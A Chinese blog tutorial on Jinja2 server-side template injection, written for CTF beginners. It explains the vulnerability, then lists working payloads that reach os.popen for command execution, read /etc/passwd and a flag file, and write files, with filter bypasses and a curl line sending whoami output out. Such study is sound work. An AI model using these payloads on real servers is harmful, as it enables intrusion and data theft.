模板注入漏洞

最新推荐文章于 2024-02-18 18:50:05 发布
最新推荐文章于 2024-02-18 18:50:05 发布
阅读量1.2k 收藏 7
点赞数
分类专栏: CTF入门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/y17861077326/article/details/115475826
版权

文章目录


SSTI(Server-Side TemplateInjection)服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下, 构造恶意输入数据,从而达到读取文件或者getshell的目的。此种类型漏洞虽然多次在CTF中,以Python语言为载体出现,但是这并不是Python模板引擎独有的漏洞。

值得注意的是:
凡是使用模板的地方都可能会出现SSTI的问题,SSTI不属于任何一种语言。

jinja2原理

以下内容,以Python的模板引擎Jinja2为例。

from flask import Flask,render_template,request
app = Flask(__name__)

@app.route('/')
def hello_world():
    name = request.args.get('name')
    return render_template('hello.html', name=name)
if __name__ == '__main__':
    app.run(host='127.0.0.1',port='8888')

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Hello from Flask</title>
    {% if name %}
        <h1>Hello {{name}}</h1>
    {% else %}
        <h1>Hello, World!</h1>
    {% endif %}
</head>
<body>

</body>
</html>

这里有两种分隔符: {% … %} 和 {{ … }} 。前者用于执行诸如 for 循环 或赋值的语句,后者把表达式的结果打印到模板上。
jinja2软件会帮助我们自动把{% for item in navigation %}等转化为html里等价的代码,最终形成可交给浏览器解析的html。

如上,正常使用模板,是不会有漏洞的。为什么呢?在这里插入图片描述
在这里插入图片描述he

后端通过name参数获取到的值是一个字符串,如上’abc’,‘2*2’.我们将该字符串作为参数,送给jinja2的模板渲染函数,该函数将会把字符串参数代替name。
{{‘abc’}}将为计算为abc字符串渲染到html上,{{‘2*2’}}将渲染为2*2字符串到html上。
当传入的参数不是字符串,而是一个表达式时,name替换后为{{2*2}},jiaja2将计算{{}}内的表达式并将结果渲染到html上

实际效果是

render_template('hello.html', name='abc')   # hello abc
render_template('hello.html', name='2*2')   # hello 2*2
render_template('hello.html', name=2*2)     # 传入的参数为表达式,结果为 hello 4

所以,因为从客户端得到的数据一般不会是表达式(或许可以,但目前我不知道如何得到),而是字符串等,所以就不会有漏洞,使得我们可以传入表达式,利用表达式来做一些文章

CTF比赛中jinja2模板注入漏洞

上面提到jinja2本身模板渲染时不会有漏洞的,那么问题出在哪里呢?

问题出在,开发人员在构造一个模板的时候,进行了参数拼接。造成的后果是:模板本身内容可以通过传入的参数进行控制

在这里插入图片描述

通过name参数,我们传入不同的值,比如传入abc,{{name}},或者{{表达式}}
模板将发生不同变化:

hello abc
hello {{name}}
hello {{表达式}}

当jinja2渲染 hello {{表达式}},将执行该表达式,并把其值渲染到html上。这就造成了漏洞。

举例:

在这里插入图片描述

漏洞根本原因:模板本身内容可以被改变,但如果按正常jinja2的规定使用, 则模板本身是固定无法修改的,只有模板中的插槽地方的值可以改变,这样就不会有漏洞

感觉这种漏洞现实中不会太常见,大概只适合CTF比赛了吧。

漏洞利用方法

常见的一种payload

{%for c in [].__class__.__base__.__subclasses__()%}
    {% if c.__name__=='catch_warnings' %}
        {{c.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('whoami').read()")}}
    {%endif%}
{%endfor%}

为什么这样构造payload?
总体思路是:利用python类的内置属性和方法,找到object类,最终找到可以执行系统命令的方法,并使用该方法。

先来看看常见的类的内置属性和方法。

__class__
__class__是类的一个内置属性

>>> [].__class__
<class 'list'>

__base__
base__返回类的直接基类。在其他payload也有__basesmro,执行一下,可以看出其中的不同,但我们构造payload的目的是拿到<class ‘object’>

__subclasses__
每个类会保存由对其直接子类的弱引用组成的列表。 此方法将返回一个由仍然存在的所有此类引用组成的列表。通俗的讲,就是返回该类的子类列表。
所以,当我们拿到<class ‘object’>时,便可以获得object类的子类列表

>>> [].__class__.__base__.__subclasses__()
[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>,...]

但是 payload为什么从object子类中找到catch_warnings类呢?

在这里插入图片描述

常用payload

知道构造原理之后,要有一些常见的payload,使用时根据实际加以改造。

//获取基本类
''.__class__.__mro__[1]
{}.__class__.__bases__[0]
().__class__.__bases__[0]
[].__class__.__bases__[0]
object

//读文件
().__class__.__bases__[0].__subclasses__()[40](r'C:\1.php').read()
object.__subclasses__()[40](r'C:\1.php').read()

//写文件
().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')
object.__subclasses__()[40]('/var/www/html/input', 'w').write('123')

//执行任意命令
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls  /var/www/html").read()' )
object.__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls  /var/www/html").read()' )

 过滤[
#getitem、pop
''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/etc/passwd').read()
''.__class__.__mro__.__getitem__(2).__subclasses__().pop(59).__init__.func_globals.linecache.os.popen('ls').read()

 过滤引号

#chr函数
{% set chr=().__class__.__bases__.__getitem__(0).__subclasses__()[59].__init__.__globals__.__builtins__.chr %}
{{().__class__.__bases__.__getitem__(0).__subclasses__().pop(40)(chr(47)%2bchr(101)%2bchr(116)%2bchr(99)%2bchr(47)%2bchr(112)%2bchr(97)%2bchr(115)%2bchr(115)%2bchr(119)%2bchr(100)).read()}}#request对象
{{().__class__.__bases__.__getitem__(0).__subclasses__().pop(40)(request.args.path).read() }}&path=/etc/passwd
#命令执行
{% set chr=().__class__.__bases__.__getitem__(0).__subclasses__()[59].__init__.__globals__.__builtins__.chr %}
{{().__class__.__bases__.__getitem__(0).__subclasses__().pop(59).__init__.func_globals.linecache.os.popen(chr(105)%2bchr(100)).read() }}
{{().__class__.__bases__.__getitem__(0).__subclasses__().pop(59).__init__.func_globals.linecache.os.popen(request.args.cmd).read() }}&cmd=id


 过滤下划线

{{''[request.args.class][request.args.mro][2][request.args.subclasses]()[40]('/etc/passwd').read() }}&class=__class__&mro=__mro__&subclasses=__subclasses__


 过滤花括号
#用{%%}标记
{% if ''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://127.0.0.1:7999/?i=`whoami`').read()=='p' %}1{% endif %}

利用实例:
要改造成jinja2模板语法

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}         //popen的参数就是要执行的命令
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("ls /").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("cat /flag").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

实际案例

HITWH靶场的一道python的template注入题。
通过response header看出后端是python而不是php
在这里插入图片描述
在这里插入图片描述

payload:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("ls /").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

在这里插入图片描述
可以看出根目录下存在名为flag的文件。

利用下面payload读取flag文件

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("cat /flag").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

在这里插入图片描述

不想带绿帽子的白帽子
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
PHPCMS2008广告模板SQL注入漏洞修复
12-19
00 漏洞描述 PHPCMS2008由于广告模块取referer不严,导致一处sql注入漏洞.可以得到管理员用户名与密码,攻击者登录后台后可能会获取webshell,对服务器进行进一步的渗透。 01 漏洞分析 漏洞产生的位置: /ads/include/ads_place.class.php的show方法中. function show($placeid) ... if($adses[0]['option']) { foreach($adses as $ads) { $contents[] = ads_content($ads, 1); $this->db->query(“INSERT IN
模板注入与_FLASK.pdf
08-08
Server Side Template Injection, 服务端模板注入,最初由James Kettle在2015年的黑帽大会上讲解。来自小米安全的安全工程师——Dayeh(呆爷),主要从模版注入Flask方向为大家带来了精彩的分享。 模板注入相较于其他注入,例如xss、sql注入、xml注入等攻击,其本质思想是一致的,服务器端接受了用户的输入,未做验证或过滤便作为模板内容的一部分,在进行模板渲染时候,发生了代码执行。目前有很多模板引擎,都可能存在这样的问题。本次议题结合Flask框架及其使用的Jinja2模板,讲解了模板注入的原理、注入手段和一些绕过方式,以及结合Python沙盒逃逸思路的一些攻击手段,最后针对模板注入漏洞的发现及防御进行了一些讨论。 模板注入基本成因 沙箱逃逸的思路 绕过防御 使用JINJA2沙箱
详解模板注入漏洞(上) .pdf
09-05
详解模板注入漏洞(上) 安全威胁 安全防御 安全运营 web安全 系统安全
OWASP Top 10大漏洞简要介绍
SuPejkj的博客
01-07 4525
0x00 前言 OWASP(开放式Web应用程序安全项目)的工具、文档、论坛和全球各地分会都是开放的,对所有致力于改进应用程序安全的人士开放,其最具权威的就是“10项最严重的Web 应用程序安全风险列表” ,总结了Web应用程序最可能、最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应知应会的知识。 A1:2017-注入 将不受信任的数据作为命令或查询的一部分发送到解析器时,会产生诸如SQL...
confluence模版注入漏洞_CVE-2023-22527
网络安全。
01-24 524
Confluence是Atlassian公司开发的一款专业的企业知识管理与协同软件,可用于构建企业wiki。Confluence Data Center和Confluence Server多个受影响版本中存在模板注入漏洞,未经身份验证的威胁者可利用该漏洞在受影响的实例上实现远程代码执行。
超详细SSTI模板注入漏洞原理讲解
qq_61955196的博客
08-11 1472
本文指在让第一次接触SSTI注入漏洞的师傅们能更加详细的了解和明白该漏洞的原理
web安全-SSTI模板注入漏洞
weixin_61956136的博客
07-31 3468
web安全-SSTI模板注入漏洞
SSTI模板注入漏洞详解(包含ctfshow web入门361)
T1ngSh0w的博客
03-16 1160
服务端接收了攻击者的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了攻击者插入的可以破坏模板的语句,从而达到攻击者的目的。
SSTI模板注入漏洞
就是我的博客
09-04 234
当前使用的一些框架,比如python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。也就是说例如:{{}}在Jinja2中作为变量包裹标识符,Jinja2在渲染的时候会把{{}}包裹的内容当做变量解析替换。比如{{1+1}}会被解析成2。
重写freemaker2.3.31的Configuration,修复 Freemarker 模板注入漏洞
08-15
针对非常老的jeecgboot版本,你没办法平滑升级,可以采用这个这种方案。 直接重写 freemarker 的类 src/main/java/freemarker/template/Configuration.java 类,在实例化 Configuration 方法里面默认加入this....
服务器端模板注入 (SSTI) 漏洞实战与技巧,网络高级工具透明代理的几种实现方式
代码讲故事
12-08 832
服务器端模板注入 (SSTI) 漏洞实战与技巧,网络高级工具透明代理的几种实现方式。 SSTI(Server-Side Template Injection)从名字可以看出即是服务器端模板注入。比如python的flask、php的thinkphp、java的spring等框架一般都采用MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。
SSTI服务器模板注入漏洞
山兔的博客
11-11 1406
该靶场重点利用 Node.js 中的模板引擎 Handlebars 中识别的服务器端模板注入漏洞。本演练将演示当开发人员未正确清理用户输入时,如何在 Web 服务器中利用 SSTI。我们还将介绍 Node.js、模板引擎和全局变量的基础知识,以及如何使用可用的受限 Javascript 命令逃离沙盒环境。
Atlassian Confluence 模板注入代码执行漏洞风险通告
亚信安全官方账号的博客
12-08 293
攻击者可远程执行任意代码,Atlassian Confluence 模板注入代码执行漏洞风险通告。亚信安全CERT强烈建议使用受影响版本的用户及时关注官方更新。
SSTI模板注入漏洞(vulhub 复现)
weixin_74790320的博客
02-18 1154
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,,模板引擎会提供一套生成html代码的程序,,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。模板引擎也会提供沙,但是可以用简而言之我的理解是模板引擎的关键就是只需要用户提供数据给模板便可以生成前端html页面,模板引擎有一定的防范机制,但是可以利用一定技术去绕过破解。
【CTF】 SSTI模板注入漏洞
ZhangAweio的博客
05-29 667
SSTI 就是服务器端模板注入,当前使用的一些框架,比如python的flaskphp的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。
服务器端模板注入(SSTI)
nextlubricate的博客
11-21 489
判断模板: X-Powered-By:ThinkPHP Python 【Mako、Tornado】 PHP 【Twig】 127.0.0.1/ssti={{4*4}} #如果算出16,可以推断出使用Mako、Tornado、Twig模板 PHP 【Smarty】 Java 【Freemarker】 127.0.0.1/ssti=${2*2} //如果算出4,可以推断出使用Smarty、Freemarker模板 Python 【Jinja】 127.0.0.1/ssti=${2*5} //如果算出55.
[GWCTF 2019]你的名字
cjdgg的博客
08-20 1496
[GWCTF 2019]你的名字 打开题目后界面如上所示,你输入什么名字后就会显示出来 说实话,这种题不出意外应该就是模板注入没跑了 试了下{{2+2}}直接报错,还是报的php的错,但是{2+2}就可以正常显示出来,这就说明{{可能被过滤了,而{可能没被过滤,所以我们再试一些只要{}就能用的句子试试,如{% set a=“test” %} 执行完了以后虽然没有回显但也没有报错,说明正常执行了这句话,确定了考点是模板注入后就得想想怎么绕过了 上网找了一篇模板注入绕过相关文章 这里用了if语句执行命令
服务端模板注入(SSTI)上
why811的博客
07-18 628
在handleCache内,首先判断有没有开启options.cache此值默认为空,所以没有进去if区间,然后在elseif处判断了hasTemplate的值是否为空,此值的定义是从arguments.length得到的,所以此值不为空,也没有进入到elseif区间内,然后就到了exports.compile处,这里在调用compile方法时把模板传入,继续跟踪此方法。内建函数很像子变量(也像Java中的方法),它们并不是数据模型中的东西,是Freemarker在数值上添加的。
SHE Oracle漏洞
最新发布
02-19
SHE Oracle漏洞是一种安全漏洞,它影响了Oracle数据库系统。该漏洞的全称是"Server-Side Template Injection in Oracle Hospitality Suite",简称为SHE Oracle漏洞。 该漏洞的原理是在Oracle Hospitality Suite(SHE)中存在一个模板注入漏洞,攻击者可以通过构造恶意的输入来执行任意代码或者获取敏感信息。具体来说,攻击者可以通过在用户输入中注入特定的模板语言代码,从而绕过输入验证和过滤机制,进而执行恶意代码。 这个漏洞的危害性很高,攻击者可以利用它来执行任意代码、访问敏感数据、控制数据库等。因此,及时修复该漏洞是非常重要的。 如果你想了解更多关于SHE Oracle漏洞的信息,建议查阅相关的安全公告和技术文档,以获取最新的修复方案和建议。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值